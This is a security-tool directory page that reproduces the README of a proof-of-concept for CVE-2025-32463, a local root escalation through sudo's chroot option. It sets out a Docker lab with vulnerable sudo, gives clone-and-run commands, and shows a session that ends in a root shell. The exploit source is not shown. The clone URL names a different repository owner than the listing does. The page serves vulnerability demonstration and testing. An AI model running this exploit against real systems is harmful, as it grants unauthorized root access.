Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32463_POC | Kitploit
Tools/GitHubGitHub/zhaduchanhzz/cve-2025-32463_poc
Privilege EscalationContainer SecurityVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubzhaduchanhzz/cve-2025-32463_poc

CVE-2025-32463_POC

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-32463 – sudo chroot ("chwoot") PoC

This repository provides a minimal, reproducible environment to demonstrate the CVE‑2025‑32463 privilege‑escalation flaw in sudo’s chroot feature.


Contents

FilePurpose
DockerfileBuilds an Ubuntu 24.04 image with vulnerable sudo 1.9.16p2 and build tools
sudo‑chwoot.shProof‑of‑concept exploit that spawns a root shell inside the chroot
run.shHelper script that builds the image (if needed) and launches the exploit container

Affected Versions

Vulnerable builds of sudo 1.9.14 up to 1.9.17 (all p‑revisions) on most Linux distributions are affected.


Quick Start

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

run.sh passes --privileged and --rm to Docker so the container cleans itself up when you exit.


Clean Up

Remove the image when you’re done:

root@kitploit:~
docker rmi sudo-chwoot

Reference

  • Stratascale CRU vulnerability note: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Download Tool